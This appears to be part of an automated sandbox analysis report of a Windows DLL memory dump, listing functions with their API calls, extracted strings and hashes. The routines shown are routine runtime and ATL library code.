_free.LIBCMT ref: 6F1A7C14
_free.LIBCMT ref: 6F1A7C2B
GetCPInfo.KERNEL32(?,?), ref: 6F1A7C73

Part of subcall function 6F1AF178: _free.LIBCMT ref: 6F1AF1E3

_free.LIBCMT ref: 6F1A7E1F
_free.LIBCMT ref: 6F1A7E32
_free.LIBCMT ref: 6F1A7E40
_free.LIBCMT ref: 6F1A7E4B
_free.LIBCMT ref: 6F1A7E8D
_free.LIBCMT ref: 6F1A7E95
_free.LIBCMT ref: 6F1A7E9D
_free.LIBCMT ref: 6F1A7EA5
_free.LIBCMT ref: 6F1A7EB3

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 2f517a6f564947f8ce932c84d9f91e2f57f63b6567f80c18d3d6834acfe640e1
Instruction ID: 5d1d4084fa711c9ace2d7fb41bb4c1ddaa4c1274da1d0abf310714fd7c6f705a
Opcode Fuzzy Hash: 2f517a6f564947f8ce932c84d9f91e2f57f63b6567f80c18d3d6834acfe640e1
Instruction Fuzzy Hash: D8B1B1759003099FDB11CF74C880BEEBBF4FF18344F10416AE469AB285D777A9619B60

Uniqueness

Uniqueness Score: -1.00%

Function 6F18A080, Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 287memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,1E3BCBB0,75C6D5B0,00000000), ref: 6F18A124
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6F18A132
MultiByteToWideChar.KERNEL32(00000003,00000000,line,000000FF,00000000,00000000,?,00000000,1E3BCBB0,75C6D5B0,00000000), ref: 6F18A14F
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6F18A170
SysFreeString.OLEAUT32(00000000), ref: 6F18A17F
SysFreeString.OLEAUT32(00000000), ref: 6F18A306
SysFreeString.OLEAUT32(00000000), ref: 6F18A358
_com_issue_error.COMSUPP ref: 6F18A366
SysFreeString.OLEAUT32(75C6D5B0), ref: 6F18A36C

Strings

8, xrefs: 6F18A22F
Arial, xrefs: 6F18A195
line, xrefs: 6F18A11B, 6F18A146

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$ByteCharMultiWide$AllocBstr_com_issue_error
String ID: 8$Arial$line
API String ID: 4202715868-2849647811
Opcode ID: 73fc7f34e93e4fffa16dfa6ff57c0d2ca2bcd9889bd568be1e94f788241aed9c
Instruction ID: 3db1dc8715e368d0fa8a4a805fe486fc0129c41e60a80ca1e49a469f82f226d6
Opcode Fuzzy Hash: 73fc7f34e93e4fffa16dfa6ff57c0d2ca2bcd9889bd568be1e94f788241aed9c
Instruction Fuzzy Hash: 9CA1E330900349EFDB10CFA4C948BEEBBB5AF55354F20415DE925AB2C0DB75AA55CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B2CA4, Relevance: 19.6, APIs: 13, Instructions: 114COMMON

Download Yara Rule

APIs

___free_lconv_mon.LIBCMT ref: 6F1B2CE8

Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44DB
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44ED
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B44FF
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4511
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4523
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4535
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4547
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B4559
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B456B
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B457D
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B458F
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B45A1
Part of subcall function 6F1B44BE: _free.LIBCMT ref: 6F1B45B3

_free.LIBCMT ref: 6F1B2CDD

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1B2CFF
_free.LIBCMT ref: 6F1B2D14
_free.LIBCMT ref: 6F1B2D1F
_free.LIBCMT ref: 6F1B2D41
_free.LIBCMT ref: 6F1B2D54
_free.LIBCMT ref: 6F1B2D62
_free.LIBCMT ref: 6F1B2D6D
_free.LIBCMT ref: 6F1B2DA5
_free.LIBCMT ref: 6F1B2DAC
_free.LIBCMT ref: 6F1B2DC9
_free.LIBCMT ref: 6F1B2DE1

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 226b51d3a685a37738691e0f47c7c415e21544900bcc10516a4b3994cc710461
Instruction ID: db5eb3c90efa079d7c35061f7297640fe8181fb4f375f78e8c18a7b2cd3c2b92
Opcode Fuzzy Hash: 226b51d3a685a37738691e0f47c7c415e21544900bcc10516a4b3994cc710461
Instruction Fuzzy Hash: 9F315C31604748DFEB129B35D844F9AB3E8BF11395F60442EE468DB194DF36F8A48720

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B45BC, Relevance: 18.4, APIs: 12, Instructions: 376COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1B4604
_free.LIBCMT ref: 6F1B4628
_free.LIBCMT ref: 6F1B4635
_free.LIBCMT ref: 6F1B465A
_free.LIBCMT ref: 6F1B4667
_free.LIBCMT ref: 6F1B4670
_free.LIBCMT ref: 6F1B494E
_free.LIBCMT ref: 6F1B4956

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 16d8ecfcfaec5a27354b5e07f68d2d6a2be87e84c9f8796bb4bf50ca492d157b
Instruction ID: 0c863b0d44b9763e6df7cf465cc5be18d1c0b9e98bc059e2e6a3cc12d49bee20
Opcode Fuzzy Hash: 16d8ecfcfaec5a27354b5e07f68d2d6a2be87e84c9f8796bb4bf50ca492d157b
Instruction Fuzzy Hash: 8EC13176D40209ABDB20CFA8CC82FDE77F8AB09754F544165FA14EB281E771A9518B60

Uniqueness

Uniqueness Score: -1.00%

Function 6F18F070, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6F18EEB0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,1E3BCBB0,00000000,00000000), ref: 6F18EEEE
Part of subcall function 6F18EEB0: CharNextW.USER32(00000000,?,?,00000000), ref: 6F18EF1B
Part of subcall function 6F18EEB0: CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF34
Part of subcall function 6F18EEB0: CharNextW.USER32(770CEEF0,?,?,00000000), ref: 6F18EF3F
Part of subcall function 6F18EEB0: CharNextW.USER32(00000001,?,?,00000000), ref: 6F18EFAE

lstrcmpiW.KERNEL32(?,6F1C8A28,?,1E3BCBB0,C000008C,00000000,?,?,00000000,6F1B9BA6,000000FF,?,6F1900F7,00000000,00000000,C000008C), ref: 6F18F0F3
lstrcmpiW.KERNEL32(?,6F1C8A2C,?,6F1900F7,00000000,00000000,C000008C,C000008C), ref: 6F18F10A

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: ccfd84173bfd246da64bacd40923dbae48cfc8a1b9e0095bc6a7e0dfc9b248ec
Instruction ID: ee7e3842d8d077ca2e50007bddb606c3992b2697f9ce62b93b3dac8239128bc9
Opcode Fuzzy Hash: ccfd84173bfd246da64bacd40923dbae48cfc8a1b9e0095bc6a7e0dfc9b248ec
Instruction Fuzzy Hash: D9D1E771900219CBDB25CF24CE48BD9B7B5AF69390F0101DAEA39A7180D734AEB9CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F1ABE31, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 338COMMON

Download Yara Rule

APIs

Part of subcall function 6F1AA294: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
Part of subcall function 6F1AA294: SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
Part of subcall function 6F1AA294: _abort.LIBCMT ref: 6F1AA342

_memcmp.LIBVCRUNTIME ref: 6F1AC0DB
_free.LIBCMT ref: 6F1AC14C
_free.LIBCMT ref: 6F1AC165
_free.LIBCMT ref: 6F1AC197
_free.LIBCMT ref: 6F1AC1A0
_free.LIBCMT ref: 6F1AC1AC
GetStartupInfoW.KERNEL32(?), ref: 6F1AC209
GetFileType.KERNEL32(?,6F1AB318,?,00000004), ref: 6F1AC272

Strings

C, xrefs: 6F1ABF99

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$FileInfoStartupType_abort_memcmp
String ID: C
API String ID: 1665419104-1037565863
Opcode ID: ecae21186ed037955b3196ad53d53d33d0cebefb0eea13fcd9e35bf0d56229bf
Instruction ID: 8c6449602e6189912113404c1f584c7c33c4ba29decc53ccfb6a4f48bd4aa9a8
Opcode Fuzzy Hash: ecae21186ed037955b3196ad53d53d33d0cebefb0eea13fcd9e35bf0d56229bf
Instruction Fuzzy Hash: ABD17E79A01219DFDB24DF28C884B9DB7B4FF59394F10459AD949A7390D732AEA0CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6F1934B0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6F1CFAA4,?,?), ref: 6F1934FA
GetClassInfoExW.USER32 ref: 6F19352D
GetClassInfoExW.USER32 ref: 6F193544
LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F193553
LoadCursorW.USER32(6F180000,00007F00), ref: 6F1935A7
GetClassInfoExW.USER32 ref: 6F1935FE
RegisterClassExW.USER32 ref: 6F193615
LeaveCriticalSection.KERNEL32(6F1CFAA4), ref: 6F1936C3

Strings

ATL:%p, xrefs: 6F1935C8

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: 772a15346cef96b67b16bb31585821184b63a583936f84b1ef2531fd853122d2
Instruction ID: 33c6c6f3362275bbc55a3efccb419155a78133d129291a32e11da3510e0350d4
Opcode Fuzzy Hash: 772a15346cef96b67b16bb31585821184b63a583936f84b1ef2531fd853122d2
Instruction Fuzzy Hash: 5371C230904B048FEB10CF69C6416AAF7F5FF59390F10465EE86A97A40E731BAA5CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F185570, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

__Getcvt.LIBCPMT ref: 6F1855AE
__Getcvt.LIBCPMT ref: 6F1855D3

Strings

false, xrefs: 6F185630
true, xrefs: 6F185669

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: false$true
API String ID: 1921796781-2658103896
Opcode ID: 2765a1df5864eb6b07e56882a932c84e96102db32ce2870b9e961e5ba6904a1e
Instruction ID: 2c51c495e89878311ca65e825f7dab591dbbfa9112e4147507dcd4b20a2e1e0c
Opcode Fuzzy Hash: 2765a1df5864eb6b07e56882a932c84e96102db32ce2870b9e961e5ba6904a1e
Instruction Fuzzy Hash: 32515731A043448FCB14CF68C54079ABBF5EF91364F24819ED8556B385C776B921CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F191130, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6F191148
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6F191175
MulDiv.KERNEL32(00000008,00000000), ref: 6F19117E
CreateFontW.GDI32(00000000), ref: 6F191187
ReleaseDC.USER32 ref: 6F191194
SetTimer.USER32 ref: 6F1911A9

Part of subcall function 6F192460: BeginPaint.USER32(?,?), ref: 6F1924A3
Part of subcall function 6F192460: GetParent.USER32(?), ref: 6F1924AC
Part of subcall function 6F192460: GetClientRect.USER32 ref: 6F1924C2
Part of subcall function 6F192460: CreateCompatibleDC.GDI32(?), ref: 6F1924C8
Part of subcall function 6F192460: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6F1924EA
Part of subcall function 6F192460: SelectObject.GDI32(00000000,00000000), ref: 6F1924F6
Part of subcall function 6F192460: SelectObject.GDI32(00000000,?), ref: 6F192508
Part of subcall function 6F192460: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6F192521
Part of subcall function 6F192460: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6F19252F
Part of subcall function 6F192460: SetBkMode.GDI32(?,00000001), ref: 6F192538
Part of subcall function 6F192460: SetTextColor.GDI32(?,00FFFFFF), ref: 6F192544
Part of subcall function 6F192460: GetClientRect.USER32 ref: 6F192556
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F192564
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F192579
Part of subcall function 6F192460: ClientToScreen.USER32(?,?), ref: 6F19259B

DeleteObject.GDI32(?), ref: 6F1911D0

Strings

Arial, xrefs: 6F19114E

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: 5232b613cc721fa38f932f9eb92724713d224db58de4e4c54aad0321bafb64cc
Instruction ID: 6844028683b5565996b56ef7142bc7483cff8c4c283fbfc3a9de121deb6bd87b
Opcode Fuzzy Hash: 5232b613cc721fa38f932f9eb92724713d224db58de4e4c54aad0321bafb64cc
Instruction Fuzzy Hash: 1E31CF71240605EBEB109F28DC85BAA7BA8FF55361F104126F501EA6D0C7B6F8B1CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6F1987A0, Relevance: 15.2, APIs: 10, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6F188D25,6F188D27,00000000,00000000,1E3BCBB0,?,00000000,?,Function_00019350,6F1CCEB8,000000FE,?,6F188D25), ref: 6F198814
MultiByteToWideChar.KERNEL32(00000000,00000000,6F188D25,?,00000000,00000000,?,Function_00019350,6F1CCEB8,000000FE,?,6F188D25), ref: 6F19888F
SysAllocString.OLEAUT32(00000000), ref: 6F19889A
_com_issue_error.COMSUPP ref: 6F1988DF
GetLastError.KERNEL32(80070057,1E3BCBB0,?,00000000,?,Function_00019350,6F1CCEB8,000000FE,?,6F188D25), ref: 6F1988E4
_com_issue_error.COMSUPP ref: 6F1988F7
_com_issue_error.COMSUPP ref: 6F198901
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00019350,6F1CCEB8,000000FE,?,6F188D25), ref: 6F198917
_com_issue_error.COMSUPP ref: 6F19892A
_com_issue_error.COMSUPP ref: 6F198934

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 943f586d9f4a841599b47cab4972d09815b595b105b92cf6ecaa8b93768c801c
Instruction ID: 8a7b291f1344c3f531665b5dd2be78a3661fd268f6d4aa99b0e26f2b63abf5b2
Opcode Fuzzy Hash: 943f586d9f4a841599b47cab4972d09815b595b105b92cf6ecaa8b93768c801c
Instruction Fuzzy Hash: 1741D771A04705EBDB00DF69CC44B9EBBA8FF457B4F50422AE519E7280D735B5208BE5

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA174, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6F1AA188

Part of subcall function 6F1A9B98: HeapFree.KERNEL32(00000000,00000000,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BAE
Part of subcall function 6F1A9B98: GetLastError.KERNEL32(6F1A6995,?,6F1A731A,000000FF,000000FF), ref: 6F1A9BC0

_free.LIBCMT ref: 6F1AA194
_free.LIBCMT ref: 6F1AA19F
_free.LIBCMT ref: 6F1AA1AA
_free.LIBCMT ref: 6F1AA1B5
_free.LIBCMT ref: 6F1AA1C0
_free.LIBCMT ref: 6F1AA1CB
_free.LIBCMT ref: 6F1AA1D6
_free.LIBCMT ref: 6F1AA1E1
_free.LIBCMT ref: 6F1AA1EF

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 993be65daa29e90a4075f94d8cc16a7a461a7fccb0e66419b36cb62082a65408
Instruction ID: 5ebe894baf528505c89f9aa81da3c78236c5246b1c55f14cf6a1df536f2109c2
Opcode Fuzzy Hash: 993be65daa29e90a4075f94d8cc16a7a461a7fccb0e66419b36cb62082a65408
Instruction Fuzzy Hash: 0611747A51020CFFCB05DF94C951CDD3BA5EF09294B9145A5F9089F2A5DB33EEA09B80

Uniqueness

Uniqueness Score: -1.00%

Function 6F18E310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,1E3BCBB0,?,?,?,6F1B9A60,000000FF), ref: 6F18E349
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6F18E359
GetModuleHandleW.KERNEL32(Advapi32.dll,1E3BCBB0,?,?,?,6F1B9A60,000000FF), ref: 6F18E3B9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6F18E3C9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6F18E418

Strings

Advapi32.dll, xrefs: 6F18E344, 6F18E3B4
RegDeleteKeyExW, xrefs: 6F18E3C3
RegDeleteKeyTransactedW, xrefs: 6F18E353

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: e608a40bf658b8718bc1beb51fef4e1ee8af3ee09d3b83a5d9920827ab8fa436
Instruction ID: d27d8a798ef782c5d6f2f7e8da0cda017a2a1c573cf683cbd051658facf8b711
Opcode Fuzzy Hash: e608a40bf658b8718bc1beb51fef4e1ee8af3ee09d3b83a5d9920827ab8fa436
Instruction Fuzzy Hash: CC31E676608605EFEB118F98D944F95BBB8EB667A0F00412BFD25D3680C736A570CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6F19829B, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6F1985E0,6F1D0D10,C000008C,?,?,6F1930BC,?,1E3BCBB0,00000000,00000000,6F1B98D0,000000FF), ref: 6F1982AD
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6F1985E0,6F1D0D10,C000008C,?,?,6F1930BC,?,1E3BCBB0,00000000,00000000), ref: 6F1982C2
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6F19833E

Strings

AtlThunk_AllocateData, xrefs: 6F1982D3
AtlThunk_DataToCode, xrefs: 6F198301
atlthunk.dll, xrefs: 6F1982BD
AtlThunk_FreeData, xrefs: 6F198318
AtlThunk_InitData, xrefs: 6F1982EA

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: fc4be6e84c195529f5e31e4bce5ad1c7273fdc3a38085a2e22526d23046197bb
Instruction ID: 4654a8ddec7253fa0cb365ded10653a7f119e4558ee925ba147dd1cea5d25ecc
Opcode Fuzzy Hash: fc4be6e84c195529f5e31e4bce5ad1c7273fdc3a38085a2e22526d23046197bb
Instruction Fuzzy Hash: 0001D234809A14BBDA019E388C49FC93B655F127E8F484099FC4476189EB76F33486D6

Uniqueness

Uniqueness Score: -1.00%

Function 6F1B128E, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42bda8bc74050bf1f73edcceae7170c5d3ea9d495d66890ddc00f925e11593a1
Instruction ID: 5601e0d1aa9e8017712b860aebe98caa8930fbfa006b1cbe50f2b607274cb563
Opcode Fuzzy Hash: 42bda8bc74050bf1f73edcceae7170c5d3ea9d495d66890ddc00f925e11593a1
Instruction Fuzzy Hash: 26C1A074E08349DFDB01DFACC850BEDBBB0AF1A390F154159E954BB291C735A961CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6F1AA294, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6F19ED16,6F1CD0A0,0000000C,00000004,00000001,00000004,?,6F184865,00000000,00000000), ref: 6F1AA298
_free.LIBCMT ref: 6F1AA2EF
_free.LIBCMT ref: 6F1AA323
SetLastError.KERNEL32(00000000,?,?,?,00000000,FFFFFFFF,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA330
SetLastError.KERNEL32(00000000,FFFFFFFF,000000FF,?,6F184865,00000000,00000000), ref: 6F1AA33C
_abort.LIBCMT ref: 6F1AA342

Strings

ios_base::failbit set, xrefs: 6F1AA296

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463512371.000000006F1CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.463544117.000000006F1D2000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: fa0755ecac55c7b007d8bf06eba0956437cc738d24a11e30eb7ca8cb1c903f36
Instruction ID: c552e7ddf84d366792a097c436e16fc3a36f67c3bddac5f45b8efbd6526484c3
Opcode Fuzzy Hash: fa0755ecac55c7b007d8bf06eba0956437cc738d24a11e30eb7ca8cb1c903f36
Instruction Fuzzy Hash: CC11883D108F01EADA011A799C58E6E3A396FD3BF5B15031AF834D51D8EF27A9319231

Uniqueness

Uniqueness Score: -1.00%

Function 6F1983A7, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6F198550,00000000), ref: 6F1983CB
HeapAlloc.KERNEL32(00000000), ref: 6F1983D2

Part of subcall function 6F19849D: IsProcessorFeaturePresent.KERNEL32(0000000C,6F1983B9,00000000,?,6F198550,00000000), ref: 6F19849F

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6F198550,00000000), ref: 6F1983E2
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6F198409
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6F19841D
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6F198430
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6F198443

Memory Dump Source

Source File: 00000003.00000002.463183511.000000006F181000.00000020.00020000.sdmp, Offset: 6F180000, based on PE: true

Associated: 00000003.00000002.463155530.000000006F180000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.463427975.000000006F1BB000.00000002.00020000.sdmp Download File
